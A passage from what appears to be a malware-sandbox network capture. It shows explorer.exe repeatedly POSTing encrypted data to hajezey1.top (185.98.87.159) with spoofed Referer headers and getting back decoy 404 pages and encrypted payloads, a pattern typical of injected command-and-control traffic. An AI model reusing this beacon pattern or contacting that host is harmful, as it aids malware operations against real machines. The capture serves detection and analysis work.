                                                                                                                          Data Ascii: "F<n?<Q-%*+8KNg:vU$P*l=}NB[RB~[L?)5l}q2Z}$]YfU:#=fpGh>7s40dv34^W,Yw"JcDM)ehw#BTqS$p^4v* cM;$%~s-Aa]t
                                                                                                                          Oct 29, 2021 17:06:41.684039116 CEST5165INData Raw: 34 a5 c5 6c 75 52 d8 bd 7c 23 b6 cd ea b9 7d 2c 96 8c e5 2b d6 9a 44 00 36 bf bf 27 a1 eb 29 95 ae 33 ea 4f ba 15 a8 42 21 72 e7 7f b2 80 87 e4 61 57 41 c9 f3 f0 22 20 f6 d5 90 ee 6d 03 97 12 3a 13 77 aa 33 3a 1a fc 92 5a 34 10 8c 90 3f ff 59 8a
                                                                                                                          Data Ascii: 4luR|#},+D6')3OB!raWA" m:w3:Z4?Yvo6!rm<G?O6~wgI"Vg^(+; LT7Y7lgmryO(^a@S}4@Rc7m&z0w.ckn`iuL?PR


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          22192.168.2.749814185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:46.681514025 CEST7108OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://qtsqgh.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 273
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:46.681529999 CEST7109OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 94 66 5d 02 c9 a1 c1 64 53 84 c6 6a
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dSj3Iw'@L|j67;nX8h7|nR7[_VH}K_-(z_$$?J\5 9h^:Bi gOLv"F34]CAn`, ]roPK
                                                                                                                          Oct 29, 2021 17:06:46.763101101 CEST7109INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:46 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          23192.168.2.749815185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:46.862818956 CEST7110OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://pfcgdf.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 198
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:46.862843037 CEST7110OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 55 a0 b3 06
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dUdea$Td?KOY8a=(JC<xD%]2*:/W.8K %k}{*xZU1j#]0u%
                                                                                                                          Oct 29, 2021 17:06:46.940515995 CEST7111INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:46 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          24192.168.2.749816185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:47.033178091 CEST7112OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://majoeohj.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 308
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:47.033190966 CEST7112OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 2a c5 84 2f
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d*/'ede9bBOUj&e!{0SS#$:$r49#G BA/g<$F,0sB[,$\9[..hc1EmM"+WQ)'=
                                                                                                                          Oct 29, 2021 17:06:47.114922047 CEST7113INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:47 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 30I:82O_%-RqdP0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          25192.168.2.749818185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:47.567079067 CEST7120OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://fftiyhdhr.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 366
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:47.567100048 CEST7120OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 10 92 bb 19
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]dKUdbCUGs]]{bSQSt(B"wEu>=.|D)}EeM7>OrF0>=dl~62F]~0Ri~hB4VcQ|eR%
                                                                                                                          Oct 29, 2021 17:06:47.644691944 CEST7121INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:47 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          26192.168.2.749819185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:47.729374886 CEST7121OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ogkwhlvf.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 180
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:47.729398966 CEST7122OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 5d a3 bf 31
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d]1;w,^8eDrR: |@m2a-I~KyUzolz}o&;;o^H/M,:]qX</
                                                                                                                          Oct 29, 2021 17:06:47.810146093 CEST7122INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:47 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          27192.168.2.749820185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:47.900202036 CEST7123OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://uopmdi.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 319
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:47.900214911 CEST7123OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 3c 83 b1 16
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d<~vbockz[0~}Egmw;@=f+Fc/J{kS"BCA"VpA#E]kBfD,qE'5M%UWj1S*d(nc7tHS83
                                                                                                                          Oct 29, 2021 17:06:47.977674961 CEST7124INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:47 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          28192.168.2.749821185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:48.061839104 CEST7125OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://iqyfkemb.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 237
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:48.061855078 CEST7125OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 13 94 87 14
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d$sok{,'I+^E$6\!K.Uzi3I~7Vu2n#Unu2;*/mi;'`60q:.ZvOQP\O$)@$rQ`
                                                                                                                          Oct 29, 2021 17:06:48.140559912 CEST7127INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:48 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da 68 22 bd c8 cb cf 3f ef c8 a9 a6 cc d5 02 47 71 98 66 3c 3d f8 bf cb 67 3f d8 97 24 a9 b9 fc f0 ba e8 57 2d c8 a1 11 19 af 7b 69 ad 72 5b 80 1c 97 36 db 64 11 82 f5 51 aa 3b c5 da a7 f1 7d 87 02 f3 35 43 25 11 00 ac 49 1d 02 a1 b7 28 e4 f0 f7 11 41 a6 a4 87 35 ce 19 c3 ce 85 d5 3a 94 d4 1b e4 2f 62 f1 22 27 c6 99 0a d7 d9 76 c5 89 10 c1 8b ba 97 28 35 bd a8 8f 59 9d 9b cf d5 f5 de 35 1f 98 92 